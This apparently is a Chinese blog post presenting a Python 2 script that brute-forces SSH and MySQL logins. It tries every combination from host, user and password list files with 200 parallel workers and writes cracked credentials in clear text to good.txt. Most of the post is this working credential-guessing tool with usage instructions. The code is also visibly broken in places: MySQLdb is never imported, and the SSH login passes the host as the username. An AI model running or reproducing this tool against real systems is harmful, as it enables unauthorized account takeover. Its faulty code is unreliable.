Python爆破SSH与MYSQL

根据提供的端口判断是MYSQL还是SSH。

比上一个的好用一些,这个可以用来批量爆破

另外,SSH部分的准确率好像有问题。

后面再添加一个FTP的,留给下次了。

代码凑合着看,如果有更高速方便的方法望告知。

Usage:python xxx --h <目标主机文件> --u <用户字典> --p <密码字典> -P <端口号>

成功的结果保存在good.txt,运行前先创建好该文件。

  1. #!coding=utf-8
  2. import re
  3. import socket
  4. import optparse
  5. import threading
  6. from multiprocessing import Pool
  7. import multiprocessing
  8.  
  # paramiko is a third-party package; when it cannot be imported the script
  # prints an install hint and stops before anything else runs.
  try:
      import paramiko
  except ImportError:
      print "[!!!]need to install paramiko modul"
      print "[!!!]Usage:pip install paramiko"
      exit()

  # Module-level state. result_user / result_pass are overwritten by
  # mysql_login on a successful connection; threads is declared global in
  # mysql_brute, but nothing in this listing appends to it.
  result_user = result_pass = None
  threads = []
  19.  
  20. #----------------------------------------------------------------------
  def main():
      """
      Entry point: read the command-line options and start the run.

      Options: --h host list file, --u user list file, --p password list
      file, -P port (int). The port is passed on unchanged; mysql_brute
      uses it to choose between the MySQL (3306) and SSH (22) paths.
      If --h is missing, an error line is printed and the process exits.
      """
      usage = 'python %prog --h <host dictionary> --u <users dictionary> --p <password dictionary> -P <port>'
      parser = optparse.OptionParser(usage)
      option_table = (
          ('--h', 'host_dic', 'string', '目标主机'),
          ('--u', 'user_dic', 'string', '用户字典'),
          ('--p', 'pwd_dic', 'string', '密码字典'),
          ('-P', 'port', 'int', '端口'),
      )
      for flag, dest, kind, text in option_table:
          parser.add_option(flag, dest=dest, type=kind, help=text)
      options, _unused = parser.parse_args()

      # Only the host file is checked here; the other options are passed
      # through as given (possibly None).
      if options.host_dic is None:
          print "[!!!]Unknon IP"
          exit()
      mysql_brute(options.host_dic, options.user_dic, options.pwd_dic, options.port)
  41.  
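  def ip_open(ip, ports):
      """
      Report whether a TCP connection to (ip, ports) can be established.

      Not called anywhere in this listing.

      :param ip: host name or IPv4 address to connect to
      :param ports: a single TCP port number (despite the plural name)
      :return: True if connect() succeeded, False on any exception
      """
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      # The timeout has to be in place before connect(); set afterwards it
      # does not bound the connection attempt at all.
      sock.settimeout(1)
      try:
          sock.connect((ip, ports))
          return True
      except Exception:
          return False
      finally:
          # Release the descriptor on both the success and the failure path.
          sock.close()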
  55.  
  56. #----------------------------------------------------------------------
  def mysql_brute(host_dic, user_dic, pwd_dic, port):
      """
      Load the three list files and queue one login attempt per combination.

      Despite its name this function drives both paths: port 3306 queues
      mysql_login, port 22 queues ssh_login, any other port queues nothing.
      Every (host, user, password) triple becomes a separate authentication
      attempt against the target service, which is the volume pattern that
      account lockout and failed-login rate alerts are meant to catch.

      :param host_dic: path of the host list file, one entry per line
      :param user_dic: path of the user list file, one entry per line
      :param pwd_dic: path of the password list file, one entry per line
      :param port: port number, also used to select the service
      :return: None
      """
      global threads

      def _read_lines(path):
          # Only the newline is stripped; other surrounding whitespace stays.
          return [entry.strip('\n') for entry in open(path, 'r').readlines()]

      try:
          hostlist = _read_lines(host_dic)
          userlist = _read_lines(user_dic)
          pwdlist = _read_lines(pwd_dic)
          print "[*] Number of hosts:" + str(len(hostlist))
          print "[*] Number of users:" + str(len(userlist))
          print "[*] Number of passwords:" + str(len(pwdlist))
      except Exception:
          # Any failure while reading the files is reported as a path error.
          print "[!] The path of the dictionary file is incorrect"
          exit()

      if port == 22:
          # paramiko's own log output goes to filename.log in the working
          # directory.
          paramiko.util.log_to_file("filename.log")

      if port == 3306:
          worker = mysql_login
      elif port == 22:
          worker = ssh_login
      else:
          worker = None

      # multiprocessing pool of 200 workers. The AsyncResult objects are
      # discarded, so an exception raised inside a worker is never surfaced.
      p = Pool(200)
      for host in hostlist:
          for user in userlist:
              for pwd in pwdlist:
                  if worker is not None:
                      p.apply_async(worker, args=(host, user, pwd, port))
      p.close()
      p.join()
  93.  
  94. #----------------------------------------------------------------------
  def ssh_login(host, username, password, port):
      """
      Make one paramiko password-login attempt and record the outcome.

      On success a highlighted line is printed and a record is appended to
      good.txt; on any exception a failure line is printed instead.

      :param host: target host
      :param username: name written to the success line and to good.txt
      :param password: password offered to the server
      :param port: SSH port
      :return: None
      """
      try:
          client = paramiko.SSHClient()
          # AutoAddPolicy accepts any unknown host key without verifying it,
          # so the identity of the server is never checked.
          client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
          client.connect(hostname=host, username=host, password=password, port=port)
          client.close()
          print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
          # The credential pair is stored in clear text; the handle is not
          # closed explicitly.
          record = open("good.txt", 'a')
          record.write(host + "=>" + username + "----" + password + "\n")
      except:
          # Bare except: authentication failures, network errors and any
          # other error all end up on this one line.
          print "[-] host:" + host + " Password:" + password
  116.  
  117. #----------------------------------------------------------------------
  def mysql_login(host, username, password, port):
      """
      Call MySQLdb.connect once with the given credentials and record the outcome.

      On success the pair is printed, copied into the module-level
      result_user / result_pass, appended to good.txt, and exit() is called.
      Any Exception prints the failure line instead.

      :param host: target host
      :param username: user name
      :param password: password
      :param port: MySQL port
      :return: None
      """
      global result_user, result_pass
      try:
          # connect_timeout=1 is the only timeout set on the connection.
          conn = MySQLdb.connect(host=host, user=username, passwd=password, port=port, connect_timeout=1)
          print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
          result_user = username
          result_pass = password
          # The credential pair is stored in clear text; the handle is not
          # closed explicitly.
          record = open("good.txt", 'a')
          record.write(host + "=>" + username + "----" + password + "\n")
          conn.close()
          # exit() raises SystemExit, which `except Exception` below does
          # not catch.
          exit()
      except Exception:
          print "[-] host:" + host + " Password:" + password
  140.  
  141.  
  142. #----------------------------------------------------------------------
  # Script entry: run main(), print the completion banner, then exit.
  # The banner is reached only when main() returns normally; the exit()
  # calls inside main() and mysql_brute end the process before it.
  if __name__ == '__main__':
      main()
      print "\033[1;32;41m[*] Scan OK! \033[0m"
      exit()

 
